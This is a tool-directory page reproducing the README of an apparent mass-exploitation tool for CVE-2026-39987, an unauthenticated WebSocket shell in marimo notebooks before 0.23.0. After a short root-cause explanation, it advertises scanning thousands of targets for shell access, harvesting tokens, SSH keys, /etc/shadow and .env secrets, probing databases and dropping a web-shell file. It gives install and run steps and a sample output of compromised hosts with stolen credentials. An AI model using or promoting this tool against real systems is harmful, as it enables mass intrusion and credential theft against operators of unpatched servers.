Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-39987 — marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-39987
Privilege EscalationExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed TeamingRemote Access Tool
GitHubnxploited/cve-2026-39987

CVE-2026-39987

marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability

View Repository
1135 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-39987

marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability

   ___  _        ___     __  __  __  __      ___  __  __  _______
  / (_)(_|   |_// (_)   /  )/  \/  )/       /   \/  |/  |/  \   /
 |       |   |  \__       /|    | /| __       __/\_/|\_/|\__/  / 
 |       |   |  /   -----/ |    |/ |/  \-----   \   |   |/  \ /  
  \___/   \_/   \___/   /___\__//___\__/    \___/   |   |\__//   

CVE-2026-39987

Marimo /terminal/ws — Unauthenticated WebSocket Pre-Auth RCE

Mass Scanner · Full Enumeration · Smart Detection


Python CVE Severity Type Platform License


Author: Nxploited  ·  Telegram: @KNxploited


📢 Join the Telegram channel for the latest free zero-days & exploits:

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


📖 Overview

CVE-2026-39987 is a critical Pre-Authentication Remote Code Execution vulnerability affecting Marimo, an open-source reactive Python notebook platform.

The terminal WebSocket endpoint /terminal/ws completely lacks authentication validation, allowing any unauthenticated remote attacker to obtain a full PTY shell and execute arbitrary system commands with the privileges of the running process — often root inside containerized deployments.

Unlike other WebSocket endpoints such as /ws, which correctly invoke validate_auth() before accepting connections, the /terminal/ws endpoint only verifies the running mode and platform compatibility, entirely skipping authentication.

✅ Patched in: marimo >= 0.23.0 ❌ All versions prior to 0.23.0 are vulnerable


🔍 Vulnerability Details

PropertyValue
CVE IDCVE-2026-39987
Affected Softwaremarimo < 0.23.0
Vulnerability ClassPre-Auth RCE via Unauthenticated WebSocket
Affected Endpoint/terminal/ws
Attack VectorNetwork
Authentication Required❌ None
User Interaction❌ None
Severity🔴 Critical
ImpactFull PTY shell · Arbitrary command execution
Fixed Versionmarimo 0.23.0

🧩 Root Cause

/ws          →  calls validate_auth()  ✅  Authentication enforced
/terminal/ws →  skips validate_auth()  ❌  No authentication

The /terminal/ws handler only checks:

  1. Whether the server is running in the correct mode
  2. Whether the platform supports terminal emulation

It never validates session tokens, cookies, or any form of identity — making every exposed Marimo instance a direct shell.


✨ Features

  • 🔥 Mass Scanner — Scan thousands of targets concurrently with configurable thread pools
  • 🧠 Smart Environment Detection — Auto-detects: Marimo · cPanel/WHM · Plesk · Apache · Nginx · Docker · Node.js · Python apps
  • 🐚 Full PTY Shell Access — Unauthenticated WebSocket shell with complete terminal emulation
  • 📓 Notebook Enumeration — Recursively discovers and reads all .py Marimo notebooks
  • 🔑 Token Harvesting — Extracts Marimo tokens from CLI arguments, ENV variables, and log files
  • 🗄️ Database Discovery — Auto-probes MySQL · PostgreSQL · Redis · SQLite · DuckDB
  • 🔐 Credential Extraction — .env files · wp-config.php · SSH private keys · /etc/shadow
  • 📂 Web Shell Verification (Nx Drop) — Writes and HTTP-verifies a proof-of-concept file to the webroot
  • 📊 Structured Per-Target Output — Every target gets its own organized output directory
  • 🎨 Rich Terminal UI — Professional color-coded interface with panels, progress tracking, and live stats

⚙️ Requirements

Python 3.10 or higher

Install dependencies:

pip install websockets rich requests urllib3

Or using the requirements file:

pip install -r requirements.txt

requirements.txt

websockets
rich
requests
urllib3

🚀 Usage

Step 1 — Prepare your targets file

Create a file named targets.txt with one target per line. The tool accepts all formats:

192.168.1.100
192.168.1.101:2718
10.10.10.50:2718
https://notebook.example.com
wss://secure.notebook.io
marimo.target.local:2718

Supported formats: bare IP · IP:port · domain · domain:port · http:// · https:// · ws:// · wss://


Step 2 — Launch the scanner

python3 CVE-2026-39987.py

Step 3 — Interactive configuration

  ▸ Targets file  (default: targets.txt) : targets.txt
  ▸ Threads       (default: 50)          : 100

Thread range: 1–300. Recommended: 50–150 depending on your network.


🖥️ Output Preview

Terminal UI

  ╭──────────────────────────────────────────────────────────╮
  │ CVE-2026-39987  ·  Marimo WebSocket RCE                  │
  │ MASS SCANNER  ·  FULL ENUM  ·  SMART DETECT              │
  │ By: Nxploited  ·  github.com/Nxploited  ·  @KNxploited   │
  ╰──────────────────────────────────────────────────────────╯

  ══════════════ ws://192.168.1.100:2718/terminal/ws ══════════

  ╭────────────────────────────────────────╮
  │  ◈◈◈  ROOT ACCESS  ◈◈◈                │
  │  ws://192.168.1.100:2718               │
  │  uid ▸  uid=0(root)  groups=[root]     │
  ╰────────────────────────────────────────╯

  ──  ENVIRONMENT  ──────────────────────────────────────────
    ✦  Type                  MARIMO
    ◈  Docker                True
    ◈  Marimo version        0.22.1
    ◈  Notebook directory    /app/notebooks

  ──  MARIMO — NOTEBOOKS  ───────────────────────────────────
    ✦  Notebooks             7 found
       ·                     /app/notebooks/analysis.py
       ·                     /app/notebooks/data_pipeline.py
       ·                     /app/notebooks/etl_job.py

  ──  MARIMO — TOKENS  ──────────────────────────────────────
    ✦  Token CLI             secret-token-abc123xyz
    ✦  .marimo.toml          /root/.marimo.toml

  ──  /etc  SENSITIVE  ──────────────────────────────────────
    ✦  /etc/shadow           READABLE  [42 entries]
    ◈  /etc/passwd           [42 lines]
    ◈  /etc/crontab          [12 lines]

  ──  SSH KEYS  ─────────────────────────────────────────────
    ✦  /root/.ssh/id_rsa     FOUND
    ✦  /root/.ssh/id_ed25519 FOUND

  ──  DATABASES  ────────────────────────────────────────────
    ✦  MySQL                 DATABASES LISTED
    ✦  Redis                 PONG — NO AUTH
    ✦  DuckDB files          /app/notebooks/data.duckdb

  ──  SENSITIVE ENV VARS  ───────────────────────────────────
    ✦  DATABASE_URL          postgresql://admin:p4ss@db:5432/prod
    ✦  AWS_SECRET_ACCESS_KEY redacted...

  ──  NX FILE DROP  ──────────────────────────────��──────────
    ✦  Shell write           /app/notebooks/Nx.py
    ✦  HTTP access           http://192.168.1.100:2718/Nx.py

  ──  COMPLETE  ─────────────────────────────────────────────
    ◈  Saved to              nx_output/192.168.1.100_2718/

  ◦ 73/200  ROOT:5  PRIV:11  SHELL:18  FAIL:39  6.3/s

Live Progress

  ◦ 73/200  ROOT:5  PRIV:11  SHELL:18  FAIL:39  6.3/s

📁 Output Structure

Download Tool